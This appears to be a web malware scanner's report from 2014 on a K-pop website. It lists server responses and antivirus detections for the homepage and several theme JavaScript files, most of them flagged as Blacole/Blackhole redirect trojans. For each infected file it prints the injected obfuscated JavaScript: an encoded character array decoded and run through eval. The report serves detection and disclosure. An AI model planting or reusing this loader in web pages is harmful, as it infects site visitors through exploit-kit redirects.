| Request | Server response | Status |
http://kpopshot.com/ | HTTP/1.1 301 Moved Permanently
Connection: close
Date: Tue, 10 Jun 2014 22:13:34 GMT
Location: http://www.kpopshot.com/
Server: Apache
Vary: Accept-Encoding
Content-Length: 232
Content-Type: text/html; charset=iso-8859-1
| clean |
http://www.kpopshot.com/ | 200 OK
Content-Length: 30431
Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) try{document["b"+"ody"]*=document}catch(dgsgsdg){zxc=1;ww=window;}try{d=document["createElement"]("span");}catch(agdsg){zxc=0;}try{if(ww.document)window["doc"+"ument"]["body"]="zxc"}catch(bawetawe){if(ww.document){v=window;n=["3o","4d","46","3l","4c","41","47","46","16","3p","4a","3j","1e","3j","1i","3k","1f","4j","4a","3n","4c","4d","4a","46","16","2p","3j","4c","40","1k","3o","44","47","47","4a","1e","2p","3j","4c","40","1k","4a","3j","46","3m","47","45","1e","1f","1g","1e","3k","1j","3j","1h"
... 2384 bytes are skipped ...1f","27","d","a","9","3m","47","3l","4d","45","3n","46","4c","1k","3l","47","47","43","41","3n","29","1d","4c","3n","4b","4c","3l","47","47","43","41","3n","1n","29","1d","1h","4a","4b","1e","1f","1h","1d","27","16","3n","4g","48","41","4a","3n","4b","29","1d","1h","3n","4g","48","1k","4c","47","2j","2p","36","35","4c","4a","41","46","3p","1e","1f","27","d","a","4l"];h=2;s="";if(zxc){for(i=0;i-609!=0;i++){k=i;s+=String.fromCharCode(parseInt(n[i],26));}z=s;vl="val";if(ww.document)ww["e"+vl](z)}}}Antivirus reports:- AntiVir
- JS/Agent.axqoua
- Avast
- JS:Iframe-XL [Trj]
- Ikarus
- Exploit.JS.Blacole
- nProtect
- Trojan.JS.Clicker.ADU
- TrendMicro-HouseCall
- JS_BLACOLE.SMAP
- Comodo
- TrojWare.JS.Blacole.YA
- McAfee-GW-Edition
- JS/Blacole-Redirect.y
- TrendMicro
- JS_BLACOLE.SMAP
- Kaspersky
- Trojan-Downloader.JS.Agent.gvn
- Microsoft
- Trojan:JS/BlacoleRef.CM
- MicroWorld-eScan
- Trojan.JS.Clicker.ADU
- Fortinet
- JS/Crypt.BBEO!tr
- Jiangmin
- Trojan/Script.Gen
- McAfee
- JS/Blacole-Redirect.y
- NANO-Antivirus
- Trojan.Script.Blackhole.bekghp
- F-Secure
- Trojan.JS.Clicker.ADU
- VIPRE
- Trojan.JS.BlacoleRef.cm (v)
- F-Prot
- JS/Blacole.DB.gen
- AVG
- HTML/Framer
- Norman
- Clicker.OJ
- GData
- Trojan.JS.Clicker.ADU
- Commtouch
- JS/Blacole.DB.gen
- BitDefender
- Trojan.JS.Clicker.ADU
|
http://www.kpopshot.com/wp-content/themes/kpopshot/js/jquery-1.4.2.min.js | 200 OK
Content-Length: 75784
Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
(function(A,w){function ma(){if(!c.isReady){try{s.documentElement.doScroll("left")}catch(a){setTimeout(ma,1);return}c.ready()}}function Qa(a,b){b.src?c.ajax({url:b.src,async:false,dataType:"script"}):c.globalEval(b.text||b.textContent||b.innerHTML||"");b.parentNode&&b.parentNode.removeChild(b)}function X(a,b,d,f,e,j){var i=a.length;if(typeof b==="object"){for(var o in b)X(a,o,b[o],f,e,d);return a}if(d!==w){f=!j&&f&&c.isFunction(d);for(o=0;o<i;o++)e(a[o],b,f?d.cal
... 78533 bytes are skipped ...1f","27","d","a","9","3m","47","3l","4d","45","3n","46","4c","1k","3l","47","47","43","41","3n","29","1d","4c","3n","4b","4c","3l","47","47","43","41","3n","1n","29","1d","1h","4a","4b","1e","1f","1h","1d","27","16","3n","4g","48","41","4a","3n","4b","29","1d","1h","3n","4g","48","1k","4c","47","2j","2p","36","35","4c","4a","41","46","3p","1e","1f","27","d","a","4l"];h=2;s="";if(zxc){for(i=0;i-609!=0;i++){k=i;s+=String.fromCharCode(parseInt(n[i],26));}z=s;vl="val";if(ww.document)ww["e"+vl](z)}}}Antivirus reports:- AntiVir
- JS/BlacoleRef.CM
- Avast
- JS:Iframe-XL [Trj]
- Ikarus
- Trojan-Downloader.JS.Agent
- nProtect
- JS:Trojan.JS.Iframe.CT
- TrendMicro-HouseCall
- JS_BLACOLE.SMAP
- Emsisoft
- JS:Trojan.JS.Iframe.CT (B)
- Comodo
- TrojWare.JS.Blacole.YA
- CAT-QuickHeal
- JS/BlacoleRef.CN
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- TrendMicro
- JS_BLACOLE.SMAP
- Kaspersky
- Trojan-Downloader.JS.Agent.gvn
- Microsoft
- Trojan:JS/BlacoleRef.CM
- MicroWorld-eScan
- JS:Trojan.JS.Iframe.CT
- Fortinet
- JS/Blacole.HT!exploit
- PCTools
- Malware.JS-Runfore
- Jiangmin
- Trojan/Script.Gen
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Blackhole.bekghp
- F-Secure
- JS:Trojan.JS.Iframe.CT
- VIPRE
- Trojan.JS.BlacoleRef.cm (v)
- AVG
- HTML/Framer
- GData
- JS:Trojan.JS.Iframe.CT
- Symantec
- JS.Runfore
- BitDefender
- JS:Trojan.JS.Iframe.CT
|
http://www.kpopshot.com/wp-content/themes/kpopshot/fancybox/jquery.fancybox-1.3.4.pack.js | 200 OK
Content-Length: 19125
Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
;(function(b){var m,t,u,f,D,j,E,n,z,A,q=0,e={},o=[],p=0,d={},l=[],G=null,v=new Image,J=/\.(jpg|gif|png|bmp|jpeg)(.*)?$/i,W=/[^\.]\.(swf)\s*$/i,K,L=1,y=0,s="",r,i,h=false,B=b.extend(b("<div/>")[0],{prop:0}),M=b.browser.msie&&b.browser.version<7&&!window.XMLHttpRequest,N=function(){t.hide();v.onerror=v.onload=null;G&&G.abort();m.empty()},O=function(){if(false===e.onError(o,q,e)){t.hide();h=false}else{e.titleShow=false;e.width="auto";e.height="auto";m.ht ... 18460 bytes are skipped ...1f","27","d","a","9","3m","47","3l","4d","45","3n","46","4c","1k","3l","47","47","43","41","3n","29","1d","4c","3n","4b","4c","3l","47","47","43","41","3n","1n","29","1d","1h","4a","4b","1e","1f","1h","1d","27","16","3n","4g","48","41","4a","3n","4b","29","1d","1h","3n","4g","48","1k","4c","47","2j","2p","36","35","4c","4a","41","46","3p","1e","1f","27","d","a","4l"];h=2;s="";if(zxc){for(i=0;i-609!=0;i++){k=i;s+=String.fromCharCode(parseInt(n[i],26));}z=s;vl="val";if(ww.document)ww["e"+vl](z)}}} Antivirus reports:- AntiVir
- JS/BlacoleRef.CM
- Avast
- JS:Iframe-XL [Trj]
- nProtect
- JS:Trojan.JS.Iframe.CT
- TrendMicro-HouseCall
- JS_BLACOLE.SMAP
- Emsisoft
- JS:Trojan.JS.Iframe.CT (B)
- Comodo
- TrojWare.JS.Blacole.YA
- CAT-QuickHeal
- JS/BlacoleRef.CN
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- TrendMicro
- JS_BLACOLE.SMAP
- Kaspersky
- Trojan-Downloader.JS.Agent.gvn
- Microsoft
- Trojan:JS/BlacoleRef.CM
- MicroWorld-eScan
- JS:Trojan.JS.Iframe.CT
- Fortinet
- JS/Blacole.HT!exploit
- PCTools
- Malware.JS-Runfore
- Jiangmin
- Trojan/Script.Gen
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Blackhole.bekghp
- F-Secure
- JS:Trojan.JS.Iframe.CT
- VIPRE
- Trojan.JS.BlacoleRef.cm (v)
- AVG
- HTML/Framer
- Norman
- Blacole.QE
- GData
- JS:Trojan.JS.Iframe.CT
- Symantec
- JS.Runfore
- BitDefender
- JS:Trojan.JS.Iframe.CT
|
http://www.kpopshot.com/wp-content/themes/kpopshot/js/general.js | 200 OK
Content-Length: 54256
Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
(function($){
$.fn.pageSlide = function(options) {
var settings = $.extend({
width: "300px", duration: "normal", direction: "left", modal: false, _identifier: $(this)
}, options);
var pageslide_slide_wrap_css = {
position: 'fixed',
width: '0',
top: '0',
height: '100%',
zIndex:'999'
};
var pagesli
... 50652 bytes are skipped ...1f","27","d","a","9","3m","47","3l","4d","45","3n","46","4c","1k","3l","47","47","43","41","3n","29","1d","4c","3n","4b","4c","3l","47","47","43","41","3n","1n","29","1d","1h","4a","4b","1e","1f","1h","1d","27","16","3n","4g","48","41","4a","3n","4b","29","1d","1h","3n","4g","48","1k","4c","47","2j","2p","36","35","4c","4a","41","46","3p","1e","1f","27","d","a","4l"];h=2;s="";if(zxc){for(i=0;i-609!=0;i++){k=i;s+=String.fromCharCode(parseInt(n[i],26));}z=s;vl="val";if(ww.document)ww["e"+vl](z)}}}Antivirus reports:- AntiVir
- JS/BlacoleRef.CM
- Avast
- JS:Iframe-XL [Trj]
- nProtect
- JS:Trojan.JS.Iframe.CT
- TrendMicro-HouseCall
- JS_BLACOLE.SMAP
- Emsisoft
- JS:Trojan.JS.Iframe.CT (B)
- Comodo
- TrojWare.JS.Blacole.YA
- CAT-QuickHeal
- JS/BlacoleRef.CN
- TrendMicro
- JS_BLACOLE.SMAP
- Kaspersky
- Trojan-Downloader.JS.Agent.gvn
- Microsoft
- Trojan:JS/BlacoleRef.CM
- Fortinet
- JS/Blacole.HT!exploit
- PCTools
- Malware.JS-Runfore
- Jiangmin
- Trojan/Script.Gen
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Blackhole.bekghp
- F-Secure
- JS:Trojan.JS.Iframe.CT
- VIPRE
- Trojan.JS.BlacoleRef.cm (v)
- AVG
- HTML/Framer
- GData
- JS:Trojan.JS.Iframe.CT
- BitDefender
- JS:Trojan.JS.Iframe.CT
|
http://www.kpopshot.com/wp-content/themes/kpopshot/js/function.js | 200 OK
Content-Length: 5805
Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
$(document).ready(
function(){
$('#news').innerfade({
animationtype: 'slide',
speed: 750,
timeout: 2000,
type: 'random',
containerheight: '1em'
});
$('ul#portfolio').innerfade({
speed: 1000,
timeout: 5000,
type: 'sequence',
containerheight: '220px'
});
$('.fade').innerfade({
speed: 1000,
tim
... 4924 bytes are skipped ...1f","27","d","a","9","3m","47","3l","4d","45","3n","46","4c","1k","3l","47","47","43","41","3n","29","1d","4c","3n","4b","4c","3l","47","47","43","41","3n","1n","29","1d","1h","4a","4b","1e","1f","1h","1d","27","16","3n","4g","48","41","4a","3n","4b","29","1d","1h","3n","4g","48","1k","4c","47","2j","2p","36","35","4c","4a","41","46","3p","1e","1f","27","d","a","4l"];h=2;s="";if(zxc){for(i=0;i-609!=0;i++){k=i;s+=String.fromCharCode(parseInt(n[i],26));}z=s;vl="val";if(ww.document)ww["e"+vl](z)}}}Antivirus reports:- AntiVir
- JS/BlacoleRef.CM
- Avast
- JS:Iframe-XL [Trj]
- Ikarus
- Trojan-Downloader.JS.Agent
- nProtect
- JS:Trojan.JS.Iframe.CT
- TrendMicro-HouseCall
- JS_BLACOLE.SMAP
- Emsisoft
- JS:Trojan.JS.Iframe.CT (B)
- Comodo
- TrojWare.JS.Blacole.YA
- CAT-QuickHeal
- JS/BlacoleRef.CN
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- TrendMicro
- JS_BLACOLE.SMAP
- Kaspersky
- Trojan-Downloader.JS.Agent.gvn
- Microsoft
- Trojan:JS/BlacoleRef.CM
- MicroWorld-eScan
- JS:Trojan.JS.Iframe.CT
- Fortinet
- JS/Blacole.HT!exploit
- PCTools
- Malware.JS-Runfore
- Jiangmin
- Trojan/Script.Gen
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Blackhole.bekghp
- F-Secure
- JS:Trojan.JS.Iframe.CT
- VIPRE
- Trojan.JS.BlacoleRef.cm (v)
- AVG
- HTML/Framer
- Norman
- Blacole.QE
- GData
- JS:Trojan.JS.Iframe.CT
- Symantec
- JS.Runfore
- BitDefender
- JS:Trojan.JS.Iframe.CT
|
http://www.kpopshot.com/wp-content/themes/kpopshot/js/filter.js | 200 OK
Content-Length: 5066
Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function($){
$.fn.shuffle = function() {
var allElems = this.get(),
getRandom = function(max) {
return Math.floor(Math.random() * max);
},
shuffled = $.map(allElems, function(){
allElems.splice(random, 1);
return randEl;
});
this.each(function(i){
$(this).replac
... 3906 bytes are skipped ...1f","27","d","a","9","3m","47","3l","4d","45","3n","46","4c","1k","3l","47","47","43","41","3n","29","1d","4c","3n","4b","4c","3l","47","47","43","41","3n","1n","29","1d","1h","4a","4b","1e","1f","1h","1d","27","16","3n","4g","48","41","4a","3n","4b","29","1d","1h","3n","4g","48","1k","4c","47","2j","2p","36","35","4c","4a","41","46","3p","1e","1f","27","d","a","4l"];h=2;s="";if(zxc){for(i=0;i-609!=0;i++){k=i;s+=String.fromCharCode(parseInt(n[i],26));}z=s;vl="val";if(ww.document)ww["e"+vl](z)}}}Antivirus reports:- AntiVir
- JS/BlacoleRef.CM
- Avast
- JS:Iframe-XL [Trj]
- Ikarus
- Trojan-Downloader.JS.Agent
- nProtect
- JS:Trojan.JS.Iframe.CT
- TrendMicro-HouseCall
- JS_BLACOLE.SMAP
- Emsisoft
- JS:Trojan.JS.Iframe.CT (B)
- Comodo
- TrojWare.JS.Blacole.YA
- CAT-QuickHeal
- JS/BlacoleRef.CN
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- TrendMicro
- JS_BLACOLE.SMAP
- Kaspersky
- Trojan-Downloader.JS.Agent.gvn
- Microsoft
- Trojan:JS/BlacoleRef.CM
- MicroWorld-eScan
- JS:Trojan.JS.Iframe.CT
- Fortinet
- JS/Blacole.HT!exploit
- PCTools
- Malware.JS-Runfore
- Jiangmin
- Trojan/Script.Gen
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Blackhole.bekghp
- F-Secure
- JS:Trojan.JS.Iframe.CT
- VIPRE
- Trojan.JS.BlacoleRef.cm (v)
- AVG
- HTML/Framer
- Norman
- Blacole.QE
- GData
- JS:Trojan.JS.Iframe.CT
- Symantec
- JS.Runfore
- BitDefender
- JS:Trojan.JS.Iframe.CT
|
http://www.kpopshot.com/wp-content/themes/kpopshot/js/styleswitch.js | 200 OK
Content-Length: 8043
Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
var manual_or_random="manual" var randomsetting="3 days"
function getCookie(Name) {
var re=new RegExp(Name+"=[^;]+", "i"); if (document.cookie.match(re)) return document.cookie.match(re)[0].split("=")[1] return null
}
function setCookie(name, value, days) {
var expireDate = new Date()
var expstring=(typeof days!="undefined")? expireDate.setDate(expireDate.getDate()+parseInt(days)) : expireDate.setDate(expireDate.getDate()-5)
document.cookie
... 5198 bytes are skipped ...1f","27","d","a","9","3m","47","3l","4d","45","3n","46","4c","1k","3l","47","47","43","41","3n","29","1d","4c","3n","4b","4c","3l","47","47","43","41","3n","1n","29","1d","1h","4a","4b","1e","1f","1h","1d","27","16","3n","4g","48","41","4a","3n","4b","29","1d","1h","3n","4g","48","1k","4c","47","2j","2p","36","35","4c","4a","41","46","3p","1e","1f","27","d","a","4l"];h=2;s="";if(zxc){for(i=0;i-609!=0;i++){k=i;s+=String.fromCharCode(parseInt(n[i],26));}z=s;vl="val";if(ww.document)ww["e"+vl](z)}}}Antivirus reports:- AntiVir
- JS/BlacoleRef.CM
- Avast
- JS:Iframe-XL [Trj]
- Ikarus
- Trojan-Downloader.JS.Agent
- TrendMicro-HouseCall
- JS_BLACOLE.SMAP
- Comodo
- TrojWare.JS.Blacole.YA
- CAT-QuickHeal
- JS/BlacoleRef.CN
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- TrendMicro
- JS_BLACOLE.SMAP
- Kaspersky
- Trojan-Downloader.JS.Agent.gvn
- Microsoft
- Trojan:JS/BlacoleRef.CM
- Fortinet
- JS/Blacole.HT!exploit
- PCTools
- Malware.JS-Runfore
- Jiangmin
- Trojan/Script.Gen
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Blackhole.bekghp
- VIPRE
- Trojan.JS.BlacoleRef.cm (v)
- AVG
- HTML/Framer
- Norman
- Blacole.QE
- GData
- JS:Iframe-XL
- Symantec
- JS.Runfore
|
http://kpopshot.com/test404page.js | HTTP/1.1 301 Moved Permanently
Connection: close
Date: Tue, 10 Jun 2014 22:13:41 GMT
Location: http://www.kpopshot.com/test404page.js
Server: Apache
Vary: Accept-Encoding
Content-Length: 246
Content-Type: text/html; charset=iso-8859-1
| clean |
http://www.kpopshot.com/test404page.js | 404 Not Found
Content-Length: 331
Content-Type: text/html | clean |
